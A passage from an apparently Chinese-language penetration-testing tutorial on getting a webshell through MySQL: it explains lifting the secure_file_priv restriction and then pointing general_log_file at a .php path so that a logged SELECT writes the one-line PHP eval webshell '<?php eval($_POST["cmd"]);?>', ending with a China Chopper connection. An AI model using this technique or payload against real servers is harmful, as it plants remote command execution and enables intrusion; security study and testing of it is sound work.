但在新版的mysql中，这句话并没有运行成功。
在这里插入图片描述
Mysql新特性secure_file_priv会对读写文件产生影响，该参数用来限制导入导出。我们可以借助show global variables like '%secure%';命令来查看该参数：

当secure_file_priv为NULL时，表示限制Mysql不允许导入导出，所以爆出错误。要想使得该语句导出成功，则需要在Mysql文件夹下修改my.ini 文件，在[mysqld]内加入secure_file_priv ="" 即可:
在这里插入图片描述
当secure_file_priv的值没有具体值时，表示不对mysqld 的导入|导出做限制，此时就可以执行导出命令。

利用Mysql日志文件

Mysql 5.0版本以上会创建日志文件，通过修改日志的全局变量，也可以getshell。但是也要对生成的日志有可读可写的权限。（注：linux因为权限问题亲测没有成功）。先来介绍两个MySQL全局变量：general_log 和 general_log file。

general log 指的是日志保存状态，ON代表开启 OFF代表关闭；
general log file 指的是日志的保存路径。

查看日志状态的命令：show variables like '%general%';
在这里插入图片描述
在以上配置中，当开启general时，所执行的sql语句都会出现在WIN-30DFNC8L78A.log文件。

那么，如果修改general_log_file的值，那么所执行的sql语句就会对应生成，进而getshell。
在这里插入图片描述
对应就会生成xxx.php文件

将一句话木马写入xxx.php文件：SELECT '<?php eval($_POST["cmd"]);?>'

接着可以看到日志文件中记录了木马语句：
最后中国菜刀连接，getshell：